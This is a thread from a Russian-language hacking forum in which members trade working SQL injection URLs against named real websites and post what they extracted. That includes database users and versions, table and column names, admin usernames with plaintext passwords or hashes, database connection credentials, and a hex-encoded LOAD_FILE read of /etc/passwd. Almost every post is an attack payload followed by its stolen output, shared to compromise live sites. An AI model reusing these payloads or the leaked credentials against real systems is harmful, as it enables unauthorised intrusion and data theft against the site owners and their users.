SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    ООО “РостИнвестЛизинг” — cовместно с Западно-Уральским банком Сбербанка РФ инвестирует свыше 200 предприятий.

    Code:
    http://ril.ru/news/?id=30+and+1=0+union+select+1,2,version(),4,5,6,7--
     
  2. _SEREGA_

    _SEREGA_ Banned

    Joined:
    28 Mar 2008
    Messages:
    132
    Likes Received:
    44
    Reputations:
    7
    скуль:
    Code:
    http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,5,6,7,8,9--
    версия:
    Code:
    http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,version(),6,7,8,9--
    5.0.27

    таблицы выводятся limit'om:

    Code:
    http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables--
    infa:

    Code:
    http://www.learnbirdsongs.com/birdsong.php?id=-5+union+select+1,2,3,4,concat_ws(0x3a,user(),database()),6,7,8,9--
    user() webtoad@localhost
    database() jfdavis_webtoad
     
    1 person likes this.
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.design.ucla.edu/people/grad.php?ID=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11
    [email protected]:dma:5.0.45

    ПС: Ачат теперь стал ин реинбов стайл?
     
  4. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    http://goglobal.fiu.edu
    Code:
    http://goglobal.fiu.edu/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,19,11,12/*
    4.1.14-nt:goglobal:[email protected]
     
  5. _SEREGA_

    _SEREGA_ Banned

    Joined:
    28 Mar 2008
    Messages:
    132
    Likes Received:
    44
    Reputations:
    7
    скуль:

    Code:
    http://www.aroma.us/info_page.php?id=-5+union+select+1,2,3,4,5--
    версия:

    Code:
    http://www.aroma.us/info_page.php?id=-5+union+select+1,2,version(),4,5--
    5.0.67

    таблицы выводятся limit'om:

    Code:
    http://www.aroma.us/info_page.php?id=-5+union+select+1,2,table_name,4,5+from+information_schema.tables--
    infa:

    Code:
    http://www.aroma.us/info_page.php?id=-5+union+select+1,2,concat_ws(0x3a,user(),database()),4,5--
    user() aroma15_aromasho@localhost
    database() aroma15_aromaonline
     
    #9105 _SEREGA_, 4 May 2009
    Last edited: 4 May 2009
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Пензенский Региональный Центр Интернет Образования
    тИЦ: 325
    PR: 4
    Code:
    http://rcio.pnzgu.ru/grad.php?id=4801
    Блинд, т.к. третяя ветка - юниона нету...

    fio@localhost - User
    fio - DB
    3.23.58 - Version
     
  7. _SEREGA_

    _SEREGA_ Banned

    Joined:
    28 Mar 2008
    Messages:
    132
    Likes Received:
    44
    Reputations:
    7
    скуль:

    Code:
    http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,2,3,4,5,6,7,8--
    версия:
    Code:
    http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,version(),3,4,5,6,7,8--
    5.0.24
    список таблиц:
    Code:
    http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables--
    видим таблицу login

    список столбцов:
    Code:
    http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns--
    видим стобцы: user и pass

    выводим инфу:

    user:
    Code:
    http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,user,3,4,5,6,7,8+from+login--
    pass:

    Code:
    http://www.exhibitionsireland.com/eventsdetails.php?id=5+union+select+1,pass,3,4,5,6,7,8+from+login--
    infa:

    user: exhibit001
    pass: ireland2


    админку не нашёл =((((((((
     
    1 person likes this.
  8. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    http://www.vdostudio.com
    Code:
    http://www.vdostudio.com/webboard/view.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
    version() - 5.0.22
    database() - vdostudio
     
  9. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://www.tepg.se/showtitle.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5--
    юзер/бд/версия:
    Code:
    [email protected] : wonderwork_db1 : 5.0.51a-24-log
    Админ:

    Code:
    http://www.tepg.se/showtitle.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),id,username,password),3,4,5+from+admin--
    ид/логин/пасс:

    Code:
    1 : hdnine : cb7ea8e5ad69ce0be6c3f1f0032dad4a
     
    #9109 -m0rgan-, 4 May 2009
    Last edited: 4 May 2009
  10. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    nfca.org(with file_priv) pr - 6:
    PHP:
    http://www.nfca.org/top25/index.php?cat_id=1&poll_id=-234271+union+select+1,2,3,4,5,concat_ws(0x3A,user(),version(),database()),LOAD_FILE(0x2f6574632f706173737764),8--+
    [email protected]:4.0.24-log:ism_data_nfca
     
    1 person likes this.
  11. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://www.autokom.cz/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6--
    юзер/бд/версия:
    Code:
    www_autokom_cz@localhost : www_autokom_cz : 5.0.45
     
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.black-time.net/usr.php?act=com&id_obj=-1+union+select+1,2,3,4,5,6,UNHEX(HEX(concat_ws(0x3a,user(),database(),version()))),8,9,10,11,12,13,14
    [email protected]:black-time:4.1.8-standard
     
  13. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    http://www.ftlauderdalenews.net (PR3)
    Code:
    http://www.ftlauderdalenews.net/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8+from+users/*
    4.1.20-max-log:promena_news:p[email protected]

    Code:
    http://www.ftlauderdalenews.net/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,password,name),5,6,7,8+from+users/*
    name : Ray Brasted
    password : 1x2y3z
     
  14. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://www.cfs-nl.ca/media-read.php?id=-1+union+all+select+0,1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),7,8,9,10,11,12--
    user/db/version:
    Code:
    cfsnl_admin@localhost : cfsnl_admin_old : 5.0.45-log
     
    2 people like this.
  15. edichka

    edichka Member

    Joined:
    31 Jan 2009
    Messages:
    19
    Likes Received:
    14
    Reputations:
    0
    cialis-cialis.com

    HTML:
    http://www.cialis-cialis.com/art.php?id=-29%20union%20select%201,2,unhex(hex(concat_ws(0x3a,version(),user(),database()))),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9
    
    4.1.10-standard:poppen_shop3@localhost:poppen_shop3
    В австрийском гугле стоит по хорошим запросам =)

    ____________________________________________
    Code:
    [SIZE=3][COLOR=DarkGreen]http://www.talkeetnachamber.org PR4[/COLOR][/SIZE]
    
    http://www.talkeetnachamber.org/news.php?id=-11%20union%20select%201,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,0,1
    
    
    [B]5.0.51a-log:talkeetn_db01:[email protected][/B]
    
    Существует интересная табличка с данными для подключения к БД 
    
    http://www.talkeetnachamber.org/news.php?id=-11%20union%20select%201,2,3,group_concat(column_name),5,6,7,8,9,0,1%20from%20information_schema.columns%20where%20table_name=0x7068704d795365617263685f73657474696e6773
    
    Действуем =)
    
    http://www.talkeetnachamber.org/news.php?id=-11%20union%20select%201,2,3,concat_ws(0x3a3a3a,DBName,DBUser,DBPassword,DBHost),5,6,7,8,9,0,1%20from%20phpMySearch_settings
    
    
    
    [I]DBName,DBUser,DBPassword,DBHost[/I]
    talkeetn_db01:::talkeetn_db01:::freckles:::localhost
     
    #9115 edichka, 5 May 2009
    Last edited: 5 May 2009
    1 person likes this.
  16. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    [PR 4]
    Code:
    http://www.golf-in-japan.com/prefcourses/data.php?ID=-178+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
    4.0.27-log:golfinja:[email protected]

    [PR 0]
    Code:
    http://www.okna-astem.ru/data.php?id=-6+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 
    5.0.51a-community:db_oknaastem1:eek:knaastem1@localhost
     
    1 person likes this.
  17. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.cash.ge/doors.php?id=1'+union+select+1,2,concat_ws(0x3a,version(),da tabase(),u ser()),4/*&lang=eng

    4.1.22-standard:cashge_aks:cashge_aks@localhost
    ------------------------------------------------------------------------
    Грузинский сайт про что то там
    http://www.muskie.ge/acus.php?lan_id=1&id=-1+union+select+1,2,concat_ws(0x3a,ver sion(),databa se(),user()),4,5--


    4.0.27:muskie_ge:muskie_ge@localhost

    PR: 2
    ------------------------------------------------------------------------
    http://mitex.ge/index.php?lang=eng&request=news&id=-1+union+select+1,concat_ws(0x3a,version(),data base(),us er()),3,4,5--

    4.1.7-max-log:mitex:mitex@localhost
     
    _________________________
    #9117 HAXTA4OK, 5 May 2009
    Last edited: 5 May 2009
    1 person likes this.
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://acthra.anu.edu.au/cases/case.php?id=86
    Blind - union почему-то не пашет.

    V: 5.0.45-log
    U: [email protected]
    DB: regent_acthra
     
  19. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    http://www.tosport.ru/detail_1247'.html
    Code:
    http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/information_schema.tables--
    C неё берём таблицу cizar_admin

    смотрим её содержимое:

    Code:
    http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/from/**/information_schema.columns/**/where/**/table_name=0x63697a61725f61646d696e--
    Code:
    id,access,login,password,name,position,address,phone,email,description,pactive,menu_access
    Дальше либо я туплю, либо...кароче вывод не получается :(

    Данные бд:
    Code:
    http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
     
  20. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Опять грузия

    http://www.webmix.ge/g_viewweb.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,concat_ws(0x3a,version(),datab ase(),us er()),40--

    5.0.75-community-log:webmixin_portfolio:webmixin_portfol@localhost

    ТИЦ: 20
    PR: 5
     
    _________________________
    1 person likes this.
Thread Status:
Not open for further replies.